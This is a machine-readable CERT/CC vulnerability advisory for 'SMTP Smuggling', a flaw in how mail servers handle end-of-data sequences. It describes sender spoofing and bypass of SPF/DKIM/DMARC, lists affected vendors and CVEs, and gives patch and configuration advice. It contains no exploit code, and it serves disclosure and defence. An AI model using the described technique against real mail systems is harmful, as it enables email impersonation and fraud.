{"document":{"acknowledgments":[{"urls":["https://kb.cert.org/vuls/id/302671#acknowledgements"]}],"category":"CERT/CC Vulnerability Note","csaf_version":"2.0","notes":[{"category":"summary","text":"### Overview\r\n\r\nA vulnerability has been found in the way that SMTP servers and software handle the end-of-data sequences (essentially the end of a single email message) in mail messages. An attacker can use this inconsistency to craft an email message that can bypass SMTP security policies.\r\n\r\n### Description\r\n\r\nSMTP protocol (refer [RFC 5321](https://www.rfc-editor.org/rfc/rfc5321) and [5322](https://www.rfc-editor.org/rfc/rfc5322)), is an Internet based protocol for e-mail transmission and exchange. The SMTP protocol is used by multiple servers to relay emails as the email is exchanged between a sender and a recipient.  This handover of emails allows for a complex number of next-hop servers to interact and exchange emails before its delivery to the intended recipient.  A priority based Mail eXchange (MX) record also allows for emails to delivered to alternate servers or partner gateways to spool and deliver in cases of outages.  In order prevent fraudulent emails, email software and services authenticate a user and employ security policies such DMARC, essentially a combination of SPF and DKIM, to certify an email's origination as it traverse these various services.\r\n\r\nSecurity researcher Timo Longin at SEC Consult discovered that the email software deployed across numerous SMTP servers treats the end-of-data sequence inconsistently. An attacker can exploit this inconsistency by crafting an email message that deviates from the standard end-of-data sequence, causing confusion as the message is transferred to its next hop. Any email server within the route of SMTP Gateways processing this manipulated message may interpret the submitted data as multiple messages, then process and relay them forward. Postfix software developer Wietse Venema explained:\r\n\r\n> The attack involves a COMPOSITION of two email services with specific differences in the way they handle line endings other than CR LF\r\n\r\nSEC-Consult researchers have labeled this vulnerability as \"SMTP Smuggling\" to discuss this problem that involves multiple stakeholders such as email service providers, email software vendors, email security product vendors and others that process and handle emails. \r\n\r\n**VU#302671**\r\nAn improper end-of-data sequence handling vulnerability in email software or services or appliances allow attackers to inject arbitrary email message that can bypass security policies.\r\n\r\n\r\nAn [Openwall](https://www.openwall.com/lists/oss-security/2023/12/24/1) community discussion also lead to the reservation of the following CVE numbers\r\n\t<table>\r\n\t\t<tr><td>Exim</td><td>[CVE-2023-51766](https://www.cve.org/CVERecord?id=CVE-2023-51766)</td></tr>\r\n\t\t<tr><td>Postfix </td><td>[CVE-2023-51764](https://www.cve.org/CVERecord?id=CVE-2023-51766) </td></tr>\r\n\t\t<tr><td>Sendmail</td><td>[CVE-2023-51765](https://www.cve.org/CVERecord?id=CVE-2023-51766)</td></tr>\r\n\t</table>\r\n\t\r\n### Impact\r\n\r\nAn attacker with access to an SMTP service can craft an email with improper end-of-data sequencing to submit two or more email messages that can be used to bypass security policy. When the attack is successful, the attacker can impersonate any sender in any domain that is hosted at the originating mail service. The attacker is then capable of avoiding In-place email handling policies, since email security scanners and gateways that analyze the message will fall prey to the improper sequencing of the message. A successful attack enables the attacker to impersonate any sender in any domain that is hosted at the originating mail service.\r\n\r\n### Solution\r\n\r\n#### Email Service Providers and Administrators\r\nPlease ensure your email software is up to date and you have applied the right workaround and/or patches provided by your software vendor. Check the *Vendor Information* section for instructions and links to the either respective advisories. If you use Email Security Appliances or managed Email Gateways ensure their software is both up to date and is configured best to mitigate these attacks and reduce the risk of improper message relay to  other SMTP servers. Ensure any email backup MX records and services that may be hosted by partners are also protected from misuse or abuse.  Email service providers are also urged to ensure that the email sender verification and header verifications are performed on every email to ensure identity of the authenticated sender is properly represented in the submitted emails. \r\n\r\n#### Email end users  \r\nAs email sender verification continues to be a challenge in the Internet, email users are urged to continue their precaution when replying to emails to provide sensitive information or when clicking on links that can download or install malicious software.  \r\n\r\n#### Additionational Resources\r\n\r\nSEC-Consult have provided both [software](https://github.com/The-Login/SMTP-Smuggling-Tools) and a [website](https://www.smtpsmuggling.com) to support analysis of the various service providers and software vendors to ensure their software and services can be verified against these attacks. \r\n\r\n \r\n### Acknowledgements\r\nThanks to the reporter Timo Longin from SEC Consult. This document was written by Timur Snoke and Vijay Sarvepalli","title":"Summary"},{"category":"legal_disclaimer","text":"THIS DOCUMENT IS PROVIDED ON AN 'AS IS' BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. ","title":"Legal Disclaimer"},{"category":"other","text":"CERT/CC Vulnerability Note is a limited advisory. It primarily identifies vendors impacted by the advisory and not specific products. We only support \"known_affected\" and \"known_not_affected\" status. Please consult the vendor's statements and advisory URL if provided by the vendor for more details ","title":"Limitations of Advisory"},{"category":"other","text":"The behavior on Cisco Secure Mail is configurable.\r\n\r\nCisco recommends using the default \"Clean messages of bare CR and LF characters\" option because it provides the best compromise between security and interoperability. However, customers using this setting should be aware of the security implications in regards to smuggled content. Customers who want to enforce RFC compliance should choose \"Reject messages with bare CR or LF characters,\" being aware of the potential interoperability issues.\r\n\r\nIn any case, Cisco strongly recommends configuring and using features such as SPF, DomainKeys Identified Mail (DKIM), or DMARC in order to validate the sender of an incoming message.","title":"Vendor statment from Cisco"},{"category":"other","text":"Open source sendmail is affected by this vulnerability. A fix is part of the sendmail 8.18.1 release.  This version enforces stricter RFC compliance by default, especially with respect to line endings.  This may cause issues with receiving messages from non-compliant MTAs; please see the release notes for mitigations.","title":"Vendor statment from Sendmail Consortium"},{"category":"other","text":"SurgeMail is vulnerable to the SMTP Smuggling Injection issue as it is unduly 'forgiving' when it comes to line termination in line with other common mail servers. This flexibility was originally added to allow legacy or 'bad' email clients/scripts to work.\r\n\r\nAs a quick fix add the setting:\r\n\r\ng_lf_fix_off \"true\"\r\n\r\nFuture releases will work correctly regardless of the above setting.\r\n\r\nIf your system needs this legacy behaviour for some reason please upgrade to SurgeMail 7.7l3 or later then set g_lf_fix_list \"1.2.3.4\" to the ip address of any legacy device.\r\n\r\nSee this page for updated information: https://surgemail.com/knowledge-base/smtp-smuggling/","title":"Vendor statment from NetWin"},{"category":"other","text":"Postfix versions prior to 3.8.4,   3.7.9,  3.6.13, and 3.5.23 accept non-standard End-of-DATA sequences, and are therefore affected by SMTP smugglling. For more information, see https://www.postfix.org/smtp-smuggling.html","title":"Vendor statment from Postfix"}],"publisher":{"category":"coordinator","contact_details":"Email: cert@cert.org, Phone: +1412 268 5800","issuing_authority":"CERT/CC under DHS/CISA https://www.cisa.gov/cybersecurity also see https://kb.cert.org/ ","name":"CERT/CC","namespace":"https://kb.cert.org/"},"references":[{"url":"https://certcc.github.io/certcc_disclosure_policy","summary":"CERT/CC vulnerability disclosure policy"},{"summary":"CERT/CC document released","category":"self","url":"https://kb.cert.org/vuls/id/302671"},{"url":"https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/","summary":"https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/"},{"url":"https://www.postfix.org/smtp-smuggling.html","summary":"https://www.postfix.org/smtp-smuggling.html"},{"url":"https://github.com/The-Login/SMTP-Smuggling-Tools","summary":"https://github.com/The-Login/SMTP-Smuggling-Tools"},{"url":"https://learn.microsoft.com/en-us/archive/blogs/tzink/what-do-we-mean-when-we-refer-to-the-sender-of-an-email","summary":"https://learn.microsoft.com/en-us/archive/blogs/tzink/what-do-we-mean-when-we-refer-to-the-sender-of-an-email"},{"url":"https://www.smtpsmuggling.com","summary":"https://www.smtpsmuggling.com"},{"url":"https://www.cisco.com/c/en/us/support/docs/security/email-security-appliance-c690x/221532-response-to-cisco-secure-email-smtp-smug.html","summary":"Reference(s) from vendor \"Cisco\""},{"url":"https://surgemail.com/knowledge-base/smtp-smuggling/","summary":"Reference(s) from vendor \"NetWin\""}],"title":"SMTP end-of-data uncertainty can be abused to spoof emails and bypass policies","tracking":{"current_release_date":"2024-01-31T18:07:52+00:00","generator":{"engine":{"name":"VINCE","version":"3.0.35"}},"id":"VU#302671","initial_release_date":"2024-01-16 15:53:55.902931+00:00","revision_history":[{"date":"2024-01-31T18:07:52+00:00","number":"1.20240131180752.6","summary":"Released on 2024-01-31T18:07:52+00:00"}],"status":"final","version":"1.20240131180752.6"}},"vulnerabilities":[{"title":"An improper end-of-data sequence handling vulnerability in email software or services or appliances allow attackers to inject arbitrary email message that can bypass security policies.","notes":[{"category":"summary","text":"An improper end-of-data sequence handling vulnerability in email software or services or appliances allow attackers to inject arbitrary email message that can bypass security policies. CVE-2023-51764 (Postfix),  CVE-2023-51765 (Sendmail) and  CVE-2023-51766 (Exim) were reserved."}],"ids":[{"system_name":"CERT/CC V Identifier ","text":"VU#302671"}],"references":[{"url":"https://www.postfix.org/smtp-smuggling.html","summary":"Affected. When receiving email from an originating email service that passes on non-standard end-of-data forms in message content, Postfix as a destination SMTP server did not distinguish between a smuggled message or a non-smuggled message, and subjected each message to the exact same policies with respect to envelope, headers, and content, whereas the smuggled envelope and headers had not been subject to the originating email service policies.\r\n\r\nOpt-in fixes have been released for supported Postfix releases 3.5, 3.6, 3.7, 3.8. An opt-out fix is available for Postfix 3.9.","category":"external"}],"product_status":{"known_affected":["CSAFPID-413b712a-39cf-11f1-8422-122e2785dc9f","CSAFPID-413cba44-39cf-11f1-8422-122e2785dc9f","CSAFPID-413d98a6-39cf-11f1-8422-122e2785dc9f"],"known_not_affected":["CSAFPID-413bc01c-39cf-11f1-8422-122e2785dc9f","CSAFPID-413c339e-39cf-11f1-8422-122e2785dc9f","CSAFPID-413d02a6-39cf-11f1-8422-122e2785dc9f","CSAFPID-413d45c2-39cf-11f1-8422-122e2785dc9f"]}}],"product_tree":{"branches":[{"category":"vendor","name":"Sendmail Consortium","product":{"name":"Sendmail Consortium Products","product_id":"CSAFPID-413b712a-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Zoho","product":{"name":"Zoho Products","product_id":"CSAFPID-413bc01c-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Cisco","product":{"name":"Cisco Products","product_id":"CSAFPID-413c339e-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Postfix","product":{"name":"Postfix Products","product_id":"CSAFPID-413cba44-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Siemens","product":{"name":"Siemens Products","product_id":"CSAFPID-413d02a6-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"Yahoo Inc.","product":{"name":"Yahoo Inc. Products","product_id":"CSAFPID-413d45c2-39cf-11f1-8422-122e2785dc9f"}},{"category":"vendor","name":"NetWin","product":{"name":"NetWin Products","product_id":"CSAFPID-413d98a6-39cf-11f1-8422-122e2785dc9f"}}]}}